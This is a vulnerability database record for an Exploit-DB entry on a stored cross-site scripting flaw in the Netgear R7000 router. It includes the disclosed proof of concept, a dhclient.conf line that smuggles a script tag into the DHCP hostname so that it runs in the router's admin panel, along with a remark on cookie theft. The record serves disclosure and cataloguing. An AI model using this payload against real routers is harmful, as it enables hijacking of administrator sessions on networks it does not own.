ID

VAR-E-201612-0154


EDB ID

40898


TITLE

Netgear R7000 - Cross-Site Scripting - Hardware webapps Exploit

Trust: 0.6

sources: EXPLOIT-DB: 40898

DESCRIPTION

Netgear R7000 - Cross-Site Scripting. Webapps exploit for Hardware platform.

Trust: 0.6

sources: EXPLOIT-DB: 40898

AFFECTED PRODUCTS

vendor: netgear, model: r7000, scope: -, version: -

Trust: 1.6

sources: EXPLOIT-DB: 40898 // EDBNET: 89493

EXPLOIT

# Exploit Title: Netgear R7000 - XSS via DHCP hostname
# Date: 11-12-2016
# Exploit Author: Vincent Yiu
# Contact: https://twitter.com/vysecurity
# Vendor Homepage: https://www.netgear.com/
# Category: Hardware / WebApp
# Version: V1.0.7.2_1.1.93 + LATEST to date

-Vulnerability
A user who is able to send DHCP requests over either a VPN or a wireless connection can supply a host name containing script tags to trigger XSS.

This could potentially be used by connecting to an open or guest Wi-Fi hotspot to inject stored XSS into the admin panel and steal the authentication cookie.

http://RouterIP/start.htm

Then visit the "view who's connected" page.

-Proof Of Concept
Set the following in /etc/dhcp/dhclient.conf:

send host-name "<script>alert('xss')</script>";

Trust: 1.0

sources: EXPLOIT-DB: 40898

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 40898

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 40898

TYPE

Cross-Site Scripting

Trust: 1.6

sources: EXPLOIT-DB: 40898 // EDBNET: 89493

CREDITS

Vincent Yiu

Trust: 0.6

sources: EXPLOIT-DB: 40898

EXTERNAL IDS

db: EXPLOIT-DB, id: 40898

Trust: 1.6

db: EDBNET, id: 89493

Trust: 0.6

sources: EXPLOIT-DB: 40898 // EDBNET: 89493

REFERENCES

url: https://www.exploit-db.com/exploits/40898/

Trust: 0.6

sources: EDBNET: 89493

SOURCES

db: EXPLOIT-DB, id: 40898
db: EDBNET, id: 89493

LAST UPDATE DATE

2022-07-27T09:54:03.642000+00:00


SOURCES RELEASE DATE

db: EXPLOIT-DB, id: 40898, date: 2016-12-11T00:00:00
db: EDBNET, id: 89493, date: 2016-12-11T00:00:00